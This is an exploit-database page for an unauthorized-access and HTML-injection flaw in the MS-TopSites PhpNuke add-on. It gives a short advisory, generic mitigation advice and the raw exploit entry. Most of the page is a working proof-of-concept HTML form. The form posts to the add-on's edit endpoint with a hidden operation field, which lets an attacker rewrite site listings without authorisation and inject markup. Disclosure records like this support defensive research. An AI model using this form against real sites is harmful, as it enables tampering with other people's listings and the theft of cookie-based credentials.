header-logo
Suggest Exploit
vendor:
MS-TopSites
by:
7.5
CVSS
HIGH
Unauthorized Access, HTML Injection
89
CWE
Product Name: MS-TopSites
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

MS-TopSites unauthorized-access and HTML-injection vulnerability

The MS-TopSites application fails to properly sanitize user-supplied data, leading to an unauthorized-access vulnerability and an HTML-injection vulnerability. An attacker can exploit these vulnerabilities to gain elevated privileges, execute arbitrary code within the webserver's context, and steal cookie-based authentication credentials.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize user-supplied data before processing it within the application. Additionally, implementing proper access controls and input validation can help prevent unauthorized access and HTML injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26358/info

MS-TopSites is prone to an unauthorized-access vulnerability and an HTML-injection vulnerability because the application fails to sufficiently sanitize user-supplied data.

An attacker can exploit these issues to gain elevated privileges on the affected application, execute arbitrary code within the context of the webserver, and steal cookie-based authentication credentials. 

<html><title>PhpNuke (add-on) MS TopSites Edit Exploit And Html Injection</title>
<body bgcolor="black" text="white">
<form action="http://localhost:81/modules.php?name=MS_TopSites&file=edit " method="post">
<input size="92" type="text" value=&#039;&#039; name="sname"> SiteNameTitle [sname] (not Target it must be changed in the source) <br />
<input size="92" type="text" value="" name="uname"> Username [uname] <br />
<input size="92" type="text" value=" http://www.0x90.com.ar" name="url"> Url<br />
<input size="92" type="text" value="mail@url.com" name="email"> Email<br />
<input size="92" type="text" value=&#039;&#039; name="bottonurl"> BottonUrl<br />
<input size="92" type="text" value="Art" name="cat"> Cat <br />
<input size="92" type="text" value="Wedonotneeddescriptions" name="description"> Descriptions<br />
<input type="hidden" value="MSTopSitesSaveSite" name="op"><br />
<input type="submit" value="submit"><br />
</body></form>
</html>

Navigation

Suggest Exploit

Services By CQR